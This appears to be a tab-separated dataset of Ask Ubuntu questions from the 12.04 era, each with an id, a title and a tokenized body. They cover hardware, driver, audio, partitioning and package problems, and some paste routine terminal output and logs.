166328	acer laptop , intel 2200bg , wireless `` disabled by hardware switch '' irrespective of switch position	i have the problem that on my old acer travelmate292 the wireless hardware switch has stopped working a couple releases ago . it worked fine in windows . bios is at the latest version , the switch is indeed in the `` on '' position , but this is not recognized by ubuntu . earlier it was possible to switch it on in windows , and reboot to ubuntu , and it would work , but i have since deleted my windows installation , so this workaround is not viable anymore . rfkill list all says hard-blocked yes , soft-blocked no , so rfkill unblock all ( as suggested in other similar questions ) does not work . how can i get a functioning wireless back ? : - (
166333	how do i run the unity panel only ?	i was wondering whether there is any way to use unity independently of the dash and hud , use just the panel with the indicators to be more exact . is there such a feature provided by default or way to attain it in either unity 2d or 3d or are there any other projects or forks that provide it ? i 'm on 12.04 .
166334	chrome reports java plugin outdated	i 've just installed the latest version of jre ( 7u5 ) and chrome still reports that it 's outdated . when i go to chrome : //plugins/ , it shows the following line for java : java - version : 1.7.0_05 download critical security update do you know how to fix this ?
166337	how to disable launcher icons for certain apps	whenever i start an app , its icon appears in the launcher . is there any way to disable this behaviour for certain specific apps ( like guake , rhythmbox , etc ) . i just want them to start without their icon appearing on the launcher . any ideas . help would be highly appreciated .
166339	how do i remove duplicate chromium extension : unity integration ?	i have installed preview release ppa of the unity web apps feature in ubuntu 12.04 . it works with a few minor problems but i understand it is a preview and not perfect yet . my problem is i seem to have duplicate extensions ( different version numbers ) resulting in getting two prompts when visiting a site that integrates with unity . how do i remove the duplicate ? or can i just delete the older extension in the chromium settings menu ?
166343	dependency issue with rhythmbox player	i want to play mp3 songs in rhythmbox player but getting issues with dependencies . i provide the two sceenshots of the problem . how do i install these dependencies ?
166351	amd propietary drivers	is it safe to install amd propietary drivers with additional drivers feature ? arent they outdated ? the one with ( post release updates ) tag fails after download . i tried to install the drivers using terminal and drivers directly from amd but it didnt work because it failed when i was trying to make .deb from .run . edit : ubuntu is choppy . i thought it was only for hd video , but exactly the same result with 240p . desktop is smooth , i have the same results with ubuntu 2d . i dont know what is wrong with ubuntu , i remember i was using ubuntu 10.10 and it was performing better than windows . now when i compare ubuntu 12 04 to windows 8 , ubuntu fails in performance . ( both 64 bit ) . i also tried playing minecraft and same lags on low settings and on high settings . this looks more like cpu performance is low . when running virtualbox ubuntu was stuck for hours then system crashed . all apps preinstalled in ubuntu 12 04 dvd version are unstable , calc crashed lol , software center crashes a lot . idk what to do with that : (
166353	how to work with processes ?	i have seen similar questions here , but i did n't get my answer . maybe it 's because i am new to all this and just do n't understand . i want my app to work mostly as an indicator . and if user would start it again it would check if it is already running , if it is then give all the input data to that process and quit . so first i need to check if it is running . i saw the answer where you can make a file witch when the program starts and then check if it exists ... but what if someone would delete it ? ca n't i just ask the os if there is process named `` myapp '' or something ? the next thing i do n't really get is how to communicate with the process . how do i give it the input data and what is it going to do with it ? does it work just like starting a new app , through the main ( ) method ? i am trying to create this using quickly . so it would be nice if you can give me some python examples or link to something like that .
166354	how to share folders using nfs ?	http : //ubuntuforums.org/showthread.php ? t=249889 in the above link it is shown that i need to do sudo apt-get install nfs-kernel-server nfs-common portmap however a software called portmap doesnot exist in ubuntu 12.04 how exactly do i configure nfs in ubuntu 12.04 ?
166360	download softwares along with dependancy	i am trying to download xen hypervisor so that when ever internet is n't available i can install it . i am using this : sudo apt-get download xen-hypervisor-4.1-i386 this will create a .deb file , but when i am going to install it , it shows me lots of dependencies errors . however , when i am using : sudo apt-get install xen-hypervisor-4.1-i386 it will work perfectly . so is there is any way to download software will all dependency packages ? ?
166370	how many security groups do i need for juju on hpcloud ?	i have run out of security groups while using juju with hpcloud . do i need security group per instance ? i have a limited quota of security groups .
166375	my computer rebooted while i was asleep -- how do i find out what happened ?	some mornings i wake up to find that my computer has rebooted for reasons unknown to me . i 've tried looking in various files in log file viewer , but none seems to provide any clues . what can i do to investigate what 's going on ? edit : this is not a power outage/surge . i 'm hooked up to a ups battery , and the logs always show that reboot happens within a minute or two of the crash .
166386	ubuntu software center not staying open , closes automatically 12.04	does anyone know how i can get my software center to stay open ? it happened after trying to use synaptic last night , do n't know if that 's what caused it , but i ca n't open that ( synaptic ) either . if it helps , when i try to open software center in the terminal i get : $ software-center 2012-07-21 10:27:27,795 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-07-21 10:27:27,800 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-07-21 10:27:28,061 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-07-21 10:27:28,195 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2012-07-21 10:27:28,480 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 149 , in open self._list.read_main_list ( ) systemerror : e : type 'b ' is not known on line 1 in source list /etc/apt/sources.list.d/danielrichter2007-grub-customizer-precise.list 2012-07-21 10:27:29,515 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1420 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1350 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 169 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 237 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 504 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 270 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 443 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 432 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' darnell @ darnell-inspiron-560 : ~ $
166392	sound does n't work on an hp pavillion dv6 ( except through headphone jack )	since ubuntu 's installation , sound never plays through the laptop speakers . however , i can get sound by listening through headphones plugged into the jack . any ideas on how to get the speakers to work ? i have an hp pavillion dv6 laptop running ubuntu 12.04 .
166397	risk of failing to use `` safely remove drive ''	what happens when the user selects `` safely remove drive '' when the drive is a usb flash memory device and what is the risk if the user simply pulls the drive without selecting that operation ? i am on precise ( 12.04 ) and the drive is a usb 3.0 flash memory .
166399	my computer ejects the cd while loading ubuntu for install	my computer will eject the ubuntu cd after staying about 5 minutes at the ubuntu logo and go black screen . i am using an external cd drive because the one in my computer does not work , and i think that might be the problem . i also tried using a usb drive but it did n't work either , any other linux works .
166402	will python scripts be run when added to /etc/network/if-up.d ?	to get my system connected to internet , i have to manually login via the web page of my isp . this is not very convenient . i found a python script online which automates this . it takes the login/password and mimics what i would have to do manually . it works fine . i open up a terminal and run the script every time . i try to put the script in /etc/network/if-up.d so that it runs automatically when the interface is up . but it does n't run and it does n't log anything where it usually logs . the script is executable and has sha bang # ! /usr/bin/python what could be the possible reason why it does n't run ? is there any other folder i have to put in ?
166408	bootable disk and application on one dvd ?	i have a program i want to use that only runs on a linux os . i 'm in the process of creating an ubuntu bootable dvd so my windows 7 computer can run the program . my question is can i also burn the program i want to run on the same dvd , or does the bootable dvd need to be dedicated strictly to ubuntu ?
166414	gobject ( gtk3 ) treeview : how can i activate row programmatically ?	i 've got a working treeview with a liststore as its model and selection set to single . how do i emit a signal to activate a specific row ? i 'm using pygi . ( sorry if this is basic ; it 's not in the python-gtk3 tutorial and much of the documentation around is based on pygtk , not pygi . )
166420	how to detect an usb device ?	i got a scenario , where a software works only when you insert the usb device provided by the software vendor in windows operating system . im trying to find the content stored in the usb device . in windows operating system , the usb device icon is not shown in my_computer . i thought , i can see the content or atleast detect the usb device in ubuntu . also in ubuntu , the drive is not detected . i tried `` sudo fdisk -l '' to know the file system , but its not useful . the drive is not detected at all . i wanted to know , how the software works only when the usb drive is inserted and it wont when it is not inserted . do they have any files stored in the usb device ? in any case , how can we detect such kind of device in ubuntu ?
166427	removed windows7 in ubuntu 12.04	after removing windows7 using gparted partition editor , i wonder if there is any files left that will affects ubuntu 12.04 . is there any command in the terminal to clean all the remaining files from windows7 ?
166429	where do the packages from software updates get saved ?	where do the updates provided by ubuntu gets stored on the hard-disk . i see that the updates are downloaded and then installed . it would of great help if i can get the location of the downloaded updates so that i can save the downloads to a usb or an external hard-drive because in case i need to format my system i do n't need to download the updates again .
166435	bash does n't use all directories from $ path to search for executable	i thought , if you call a command in bash , all of the directories set in $ path would be searched for this command . ( running as root ) $ clamscan ./ -bash : /usr/bin/clamscan : no such file or directory there is no clamscan in /usr/bin/ , but in /usr/local/bin/ ( and works if i call it from there ) : $ ls -hail /usr/local/bin/ 62259565 drwxr-xr-x 2 root root 4.0k jul 21 14:19 . 62259561 drwxr-xr-x 11 root root 4.0k apr 11 19:55 .. 62260816 -rwxr-xr-x 1 root root 1.1k jul 21 14:19 clamav-config 62260819 -rwxr-xr-x 1 root root 75k jul 21 14:19 clambc 62260817 -rwxr-xr-x 1 root root 79k jul 21 14:19 clamconf 62260821 -rwxr-xr-x 1 root root 141k jul 21 14:19 clamdscan 62260823 -rwxr-xr-x 1 root root 137k jul 21 14:19 clamdtop 62260822 -rwxr-xr-x 1 root root 95k jul 21 14:19 clamscan 62260818 -rwxr-xr-x 1 root root 148k jul 21 14:19 freshclam i never changed $ path . the directory /usr/local/bin/ is stated . $ echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games it could work if i copy the files from /usr/local/bin/ to /usr/bin/ , but i wonder why bash seems to only ask this single directory .
166436	ubuntu 12.04 archive.ubuntu.com fails to connect during update	i have ubuntu 12.04 unity and when i try to do a sudo apt-get update it fails to connect to archive.ubuntu.com which also fail to connect via browser , her 's what i get in terminal : moqane @ home : ~ $ sudo apt-get update [ sudo ] password for moqane : ign http : //security.ubuntu.com precise-security inrelease ign http : //extras.ubuntu.com precise inrelease hit http : //security.ubuntu.com precise-security release.gpg hit http : //extras.ubuntu.com precise release.gpg hit http : //security.ubuntu.com precise-security release hit http : //extras.ubuntu.com precise release hit http : //security.ubuntu.com precise-security/main sources hit http : //extras.ubuntu.com precise/main sources hit http : //security.ubuntu.com precise-security/restricted sources hit http : //security.ubuntu.com precise-security/universe sources hit http : //security.ubuntu.com precise-security/multiverse sources hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //extras.ubuntu.com precise/main translation-en ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //archive.ubuntu.com precise-backports inrelease 88 % [ connecting to archive.ubuntu.com ] i think that something 's wrong and the website is only down for me , if you have any ideas feel free to help ... thank you .
166442	`` libgjs0c conflicts with libgjs0 '' error when using dpkg	today i tried to install a dpkg but it fails , it happened when i tried to install kernel , too . mahdi @ mahdi-system : ~ $ sudo dpkg -i ~/downloads/libgjs0_0.5-1ubuntu2_i386.deb selecting previously unselected package libgjs0 . dpkg : regarding ... /libgjs0_0.5-1ubuntu2_i386.deb containing libgjs0 : libgjs0c conflicts with libgjs0 libgjs0 ( version 0.5-1ubuntu2 ) is to be installed . dpkg : error processing /home/mahdi/downloads/libgjs0_0.5-1ubuntu2_i386.deb ( -- install ) : conflicting packages - not installing libgjs0 errors were encountered while processing : /home/mahdi/downloads/libgjs0_0.5-1ubuntu2_i386.deb any idea ?
166443	only two audio channels work on an acer 4830t	i have been trying to get the surround sound working on my laptop for a couple of hours now . i have the acter timelinex 4830t , and i have gotten everything working accept the speakers . it has a 5.1 surround system built in , but only the front left and right speaker work . any help would be appreciated . and here is the alsa information : http : //www.alsa-project.org/db/ ? f=448f38630385f020faf6dc204b551f8398c53e96
166447	mouse scroll not working on oracle virtualbox	i have windows7x64 and oracle virtualbox 4.1.18 installed on it.i installed ubuntu 12.04x64 and when i use it , mouse scrolling ( logitech m175 ) is not working . what i should do to make it work ?
166453	how to create user account via a bash script ?	i need to create a new user account with password in more than 200 systems . what will be the easiest way ? is it possible to do this task via bash script or perl script ?
166455	how do i make luakit my default browser ?	i tried system settings - > details - > default applications - > web but it 's not listed as a web browser . i also tried using update-alternatives , and it 's listed there , but setting this does n't seem to change anything -- when i try gnome-open http : //www.something.com it still opens with firefox . i also tried changing the gconf settings for /desktop/gnome/url-handlers/ but that does n't seem to stick . what can i do to make luakit my default browser ?
166456	how to get back the alt +tab functionality ?	i lost the alt+tab functionality . how to get it back ? note : i m using ubuntu 12.04 without unity i m using gnome classic ( no effects ) session so the unity plug-in is deselected in compizconfig settings manager for performance purpose . i have same settings on an other pc , and on this pc the alt+tab functionality is running fine .
166461	no audio on hdmi tv display	i been trying to set up my vizio hd tv as a monitor for my pc trough hdmi , i get video not as good as it is on windows 7 but ok i can deal with that is not that bad . my problem is that i get no audio , the sound stays in my laptop . this is a list of things i done to try to fix this issue : ran additional drivers app . to identify my monitor and install the drivers and i get 2 options they are basically the same i believe ati/amd proprietary fglrx graphics driver ati/amd proprietary fglrx graphics driver ( post-release update ) i could n't install ati/amd proprietary fglrx graphics driver ( post-release update ) due to some error : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log so i installed the other one . i opened sound settings and i was hoping i could switch my output device but to my surprise the only output device available was the built in device ; i been looking all over for a solution to this problem . i cant fix it please help . here is a the results to lspci cmd hope you see all the info you need regarding my sound and video card . **processor : amd a6-4400m apu with radeon ( tm ) hd graphics ă 2 grapics : vesa : dvst driver : vesa : dvst** cnc @ cnc-hp-pavilion-g7-notebook-pc : ~ $ lspci 00:00.0 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root complex **00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati device 9990 00:01.1 audio device : advanced micro devices [ amd ] nee ati device 9902 00:04.0 pci bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root port** 00:10.0 usb controller : advanced micro devices [ amd ] hudson usb xhci controller ( rev 03 ) 00:10.1 usb controller : advanced micro devices [ amd ] hudson usb xhci controller ( rev 03 ) 00:11.0 sata controller : advanced micro devices [ amd ] hudson sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:13.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:13.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:14.0 smbus : advanced micro devices [ amd ] hudson smbus controller ( rev 14 ) 00:14.2 audio device : advanced micro devices [ amd ] hudson azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices [ amd ] hudson lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices [ amd ] hudson pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:15.0 pci bridge : advanced micro devices [ amd ] device 43a0 00:15.1 pci bridge : advanced micro devices [ amd ] device 43a1 00:18.0 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 0 00:18.1 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 5 02:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5229 ( rev 01 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e p jockey.log : 2012-07-21 01:41:23,620 debug : updating < jockey.detection.localkernelmodulesdriverdb instance at 0x1062e60 > 2012-07-21 01:41:27,137 debug : reading modalias file /lib/modules/3.2.0-23-generic/modules.alias 2012-07-21 01:41:27,369 debug : reading modalias file /usr/share/jockey/modaliases/b43 2012-07-21 01:41:27,420 debug : reading modalias file /usr/share/jockey/modaliases/disable-upstream-nvidia 2012-07-21 01:41:27,568 debug : loading custom handler /usr/share/jockey/handlers/madwifi.py 2012-07-21 01:41:27,671 warning : modinfo for module ath_pci failed : error : modinfo : could not find module ath_pci 2012-07-21 01:41:27,671 debug : instantiated handler subclass __builtin__.madwifihandler from name madwifihandler 2012-07-21 01:41:27,672 debug : alternate atheros `` madwifi '' driver availability undetermined , adding to pool 2012-07-21 01:41:27,672 debug : loading custom handler /usr/share/jockey/handlers/broadcom_wl.py 2012-07-21 01:41:27,733 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2012-07-21 01:41:27,769 debug : instantiated handler subclass __builtin__.broadcomwlhandler from name broadcomwlhandler 2012-07-21 01:41:27,769 debug : broadcom sta wireless driver availability undetermined , adding to pool 2012-07-21 01:41:27,769 debug : loading custom handler /usr/share/jockey/handlers/nvidia.py 2012-07-21 01:41:27,929 warning : modinfo for module nvidia_96 failed : error : modinfo : could not find module nvidia_96 2012-07-21 01:41:27,935 debug : instantiated handler subclass __builtin__.nvidiadriver96 from name nvidiadriver96 2012-07-21 01:41:27,937 debug : nvidia.available : falling back to default 2012-07-21 01:41:28,265 debug : xorgdriverhandler ( nvidia_96 , nvidia-96 , none ) : disabling as package video abi xorg-video-abi-10 does not match x.org video abi xorg-video-abi-11 2012-07-21 01:41:28,265 debug : nvidia accelerated graphics driver not available 2012-07-21 01:41:28,270 warning : modinfo for module nvidia_current failed : error : modinfo : could not find module nvidia_current 2012-07-21 01:41:28,276 debug : instantiated handler subclass __builtin__.nvidiadrivercurrent from name nvidiadrivercurrent 2012-07-21 01:41:28,277 debug : nvidia.available : falling back to default 2012-07-21 01:41:28,330 debug : nvidia accelerated graphics driver availability undetermined , adding to pool 2012-07-21 01:41:28,338 warning : modinfo for module nvidia_current_updates failed : error : modinfo : could not find module nvidia_current_updates 2012-07-21 01:41:28,343 debug : instantiated handler subclass __builtin__.nvidiadrivercurrentupdates from name nvidiadrivercurrentupdates 2012-07-21 01:41:28,344 debug : nvidia.available : falling back to default 2012-07-21 01:41:28,399 debug : nvidia accelerated graphics driver ( post-release updates ) availability undetermined , adding to pool 2012-07-21 01:41:28,403 warning : modinfo for module nvidia_173_updates failed : error : modinfo : could not find module nvidia_173_updates
166462	how to circumvent `` illegal instruction error '' with midori , luakit and surf	i just installed a fresh minimal ubuntu 12.04 system , first without x , then i installed xinit and xmonad . after that i installed some lightweight browsers : surf , luakit and midori . when i start one of those browsers from commandline it works until i enter the url . then the browser quits and on the comandline there is an error message : illegal instruction after that i tried firefox and chromium which worked without problem . any idea how to fix this ? if not , where is the best place to report this bug ? ( it is not clear to me where to do so , because it seems to affect muliple packages - my first guess was that it might a problem with webkit but chromium runs without problems ) edit i finally reported the bug to https : //launchpad.net/ubuntu/+source/luakit/+bug/1027787
166464	how can i programatically show/hide my app window with global shortcut key ?	i 'm writing a notational velocity clone for gnome/ubuntu using quickly ( pygi ) and i want to allow users to set a global shortcut key that will toggle the visibility of the app window when the app is running ( something like tilda does for its terminal emulator ) . i.e. , once the app is launched , a user could press f2 to hide the window , and then press f2 again to make it visible and bring it to the front . i do n't want to use an external hotkey app or anything that requires out-of-app settings . how would i go about this ? there 's a similar question here : how can i listen on global keypress event ? but the main answer there is a cludgy non-programmatic solution . one commenter mentions `` grabbing the keyboard with an x api call '' but i 'm not sure where to start with that .
166466	how do i remove an item from the gnome-classic panel ?	how do i remove an item from the gnome-classic top panel ? pressing alt and then clicking the right mouse button only gives me an option for adding an item . there is no option for removing an item .
166469	how do i reduce the size of my system 's root ( / ) partition ?	how to change partition table on my harddrive . i want to reduce the size of / partition on 500 gb hard-drive , currently size of / partition is 250 gb . i want to make it to 150 gb and use the 100 gb for storing my other data . current partition table is as follows : - filesystem size used avail use % mounted on /dev/sda1 233g 6.6g 215g 3 % / udev 2.9g 4.0k 2.9g 1 % /dev tmpfs 1.2g 884k 1.2g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.9g 252k 2.9g 1 % /run/shm /dev/sda7 38g 690m 35g 2 % /tmp /dev/sda6 93g 1.6g 87g 2 % /boot /dev/sda5 93g 1.6g 87g 2 % /home
166479	sharing files between a windows7 host and a guest ubuntu running inside virtualbox	i 've got a question regarding sharing files between a windows7 host and a guest ubuntu running inside virtualbox . the question was asked here with no answers : http : //stackoverflow.com/questions/11565446/oracle-virtualbox-mounting-windows-7-host-folder-into-guest-ubuntu-12-04-direct i 've searched but not found an answer ... thought i might have to install virtual box guest additions , but where do i get this from ? ? ? the question is reproduced here for your convenience : i know this is not strictly a question about programming but i need to mount the shared folder in order to continue my coding ... i 've got a windows 7 os with a guest ubuntu 12.04 os inside virtualbox . i have been trying to mount a shared folder created in virtualbox . the virtual folder is basically the c : \ file system on windows 7 . in virtualbox the shared folder appears as : folder path : c : \ folder name : windows7 sudo mount -t vboxsf windows7 /windows7 but the virtualbox shared folder filesystem type is not recognized by the `` mount '' command . the error i get is : mount : unknown filesystem type 'vboxsf' conversely , if i try it from the dos prompt i also get an error after a long pause : net use x : \vboxsvr\windows7 ( the error which is in my locale basically says : it is impossible to find the network path ) . so , what should i do . i 've been able to do this operation in the past a previous version of ubuntu and virtualbox by installing something called `` guest additions '' . could someone please shed some light on how to solve this problem ?
166487	gimp 2.8 install problem - ubuntu 12.04	i wanted to install the new gimp release , as it came out officially some time ago . i 've had the old 2.6 version installed on my ubuntu 12.04 and removed it . then i 've updated ( sudo apt-get update ) . now when i want to install gimp over the terminal as normally ( sudo apt-get install gimp ) i have this problem that it always installs the old 2.6 version instead of the new 2.8 is there something wrong with the ppa or how to solve this ?
166488	downloading youtube videos with minitube	minitube has been working great for a lot of the youtube links , but for videos that require confirmation that you 're older than 18 , they do n't work . is there something i can do about this ? or if there 's a better way to download the videos do tell .
166497	how can i change the sound device used by one application ?	i 'm trying to play some sounds using my standard sound card while playing some other sounds over another soundcard . how can i set which application uses which soundcard . i only found ways to set all applications to use one of the two .
166504	macbook pro wifi wo n't work	i opened xdiganose and it told me to go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware in order to download and install the wireless driver . i followed the instructions for ubuntu and it aborted the installation saying something about an unsupported device ( i should 've saved the output , i 'm using a late 2011 13 '' macbook pro . ) now when i try sudo apt-get install firmware-b43-installer i get this : reading package lists ... done building dependency tree reading state information ... done firmware-b43-installer is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 338 not upgraded . what do i do ?
166510	bash command to lock the screen in unity	i am in need to lock my screen with a bash command . the commands below will provide a blank screen , however the desktop is brought back without a password prompt . is there a better way to do this ? also , is there a setting to offer a password prompt on hibernation resume ? ! gnome-screensaver-command -- lock gnome-screensaver-command -l
166513	install ubuntu 12.04 64bits on dell xps 14 ultrabook	i can not install ubuntu 12.04 64 bits on my new dell xps 14 ultrabook . when i tried to install it from a usb drive or wubi the installer says : `` no root file system selected '' . the problem is that i can not see my hard drives and i can not create a new partition , delete one , etc. , bc the buttons are disabled . hardware : 3rd generation intel® core™ i7-3517u processor ( 4m cache , up to 3.0 ghz ) 14.0 '' hd+ ( 900p ) truelife infinity display with skype-certified hi-def webcam 8gb2 ddr3 sdram at 1333mhz 500gb 5400 hdd with 32gb msata nvidia® geforce® gt 630m with 1gb gddr5 vram any ideas ? thanks in advance .
166514	disk partitioning for 12.04 install	i have 6 partitions with grub from an existing linux os on /dev/sda8 . i want to install 12.04 on /dev/sda1 but since this partition has 31g allocated i want to resize it to 10g and create 2 more partitions from the remaining space . i want to know if by doing this will all my existing partitions get shifted and thereby i might have to reinstall them again or is it just a matter of reinstalling the grub on one of them ( say ubuntu ) and add the remaining ones ? additional information : i 've sda1 , sda5 , sda6 , sda7 ( swap ) , sda8 , sda9 , sda10 , i plan to delete sda1 and recreate 3 partitions and have 12.04 installed in one of them , the existing ones might also get shifted , as a result grub on sda8 might not work so my machine would be completely unusable until grub is fixed . will a resulting not optimal partition order cause any of the existing linux os 's to not boot or is it just a bad partition table arrangement which wo n't really affect any os in the disk ? i had a bad experience last time around when disk numberings got rearranged and i had a tough time recovering everything . do n't remember what happened , so wanted to avoid any such issue this time . edit : @ elijah/ @ takkat - this is my first time using this website so did n't know i had to edit my original questions for additional information . i 'll do that going forward . however i did n't find any delete option for two of my answers to remove them . can you please remove those two answers ? thanks in advance .
166515	is there a way suspend 12.04 using a bash command while keeping the password prompt ?	i desire to suspend my ubuntu 12.04 install with a bash script . the pm-suspend command will not prompt for a password when resumed . is there a way to suspend my machine and have a password prompt when resumed via a bash command ?
166516	how does one get an epson stylus sx425w to work with ubuntu 12.04	have tried down loading it from computer but it will only go so far then says that there is an error see /var/log/jockey.log . the printer will respond to the command print but will not print , it takes all the paper and puts it through the machine until it runs out of supply
166519	printer sometimes does n't print	i installed 12.04lts and have a deskjet 1125c connected through usb . the problem : sometimes it does not print - in print jobs is status pending/processing but print does not start . i discovered if i print some documents then next document simply does n't print with status processing or status pending . the only way is to disconnect printer from usb and immediately reconnect then works ok some times .
166523	i can hear myself in speakers	im trying to set up my microphone to work with ubuntu 12 the problem is that i can hear myself when i speak . and if i play for example music , the music then triggers the indicator for the microphone volume . so the output of the speakers is somehow also send to the microphone . so it 's impossible to use for example teamspeak because of the rustle . how can i fix this ?
166524	how to build compiz from source ?	similarly to this question made for unity , i would like to know what is the correct procedure to build the latest development release of compiz from source . in particular , it would be useful to know if it 's possible to install it avoiding the risk of breaking the one from the repositories ( maybe using checkinstall , or installing it in a different location ? )
166529	12.04 cant play sounds	hi i have a problem with my sound with ubuntu it just stopped play sounds out of no where today and i do n't know why . it can play sounds out of the headphone jack still . i 'm running ubuntu on a dell latitude d620 please help . thanks !
166535	ubuntu 12.04 install to usb flash drive	i used the nch burn software to burn the .iso image to a dvd-r ; however , when i go to see if there is an .iso file there , it does n't appear , so i ca n't select it in the process of installing ubuntu 12.04 to this flash drive . any ideas ?
166538	problems with ubuntu and amd a10-4655m apu	i have a new hp sleekbook 6z with amd a10-4655m apu . i tried installing ubuntu with wubi -- the first attempt ended up with a 'amd unsupported hardware ' watermark that i was n't able to remove ( the appeared when i tried to update the drivers as ubuntu suggested ) on the second attempted install ubuntu installed ( i stayed away from the suggested drivers ) but the performance was extremely poor -- -- as in windows vista poor . i am not sure what the solution is -- if i need to wait until there is a kernel update with ubuntu or if there are other solutions -- i realise this is a new apu for the market . i would love to have ubuntu 12.04 up and running -- windows 7 does very well with this new processor so ubuntu should , well , be lightening speed . the trial on the sleekbook with ubuntu 12.10 alpha 2 release was a complete failure . i created a bootable usb . by using either the 'try ubuntu ' or 'install ubuntu ' options resulted in the usual purple ubuntu splash screen , followed by nothing ... as in a black screen without any hint of life . interestingly one can hear the ubuntu intro sound . in case you are wondering , this same usb was trialed subsequently on another computer with and intel atom processor . worked flawlessly . lastly the second trial on the sleekbook resulted in the same results as the first paragraph . perhaps 12.10 beta will overcome this issue , or the finalised 12.10 release in october . i do n't have the expertise to know what the cause of the behaviour is-the issue could be something else entirely . sadly , the windows 7 performance is very good with this processor-very similar and in some instances better to the 2nd generation intel i5 based computer 